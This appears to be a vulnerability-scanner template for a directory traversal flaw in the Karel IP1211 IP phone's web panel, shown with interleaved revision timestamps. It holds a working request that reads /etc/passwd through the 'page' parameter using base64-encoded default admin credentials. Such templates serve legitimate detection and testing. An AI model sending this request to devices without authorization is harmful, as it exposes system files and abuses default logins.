2021-09-06 08:54:33 +00:00
id : karel-ip-phone-lfi
info :
name : Karel IP Phone IP1211 Web Management Panel - Directory Traversal
author : 0x_Akoko
severity : high
2021-10-14 13:10:54 +00:00
description : A vulnerability in the Karel IP Phone IP1211 Web Management Panel allows remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter.
2021-09-06 09:17:45 +00:00
reference :
- https://cxsecurity.com/issue/WLB-2020100038
- https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon
2021-09-06 08:54:33 +00:00
tags : karel,lfi
requests :
- method : GET
path :
- "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd"
2021-09-10 06:36:54 +00:00
headers :
Authorization : Basic YWRtaW46YWRtaW4=
2021-09-06 08:54:33 +00:00
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200
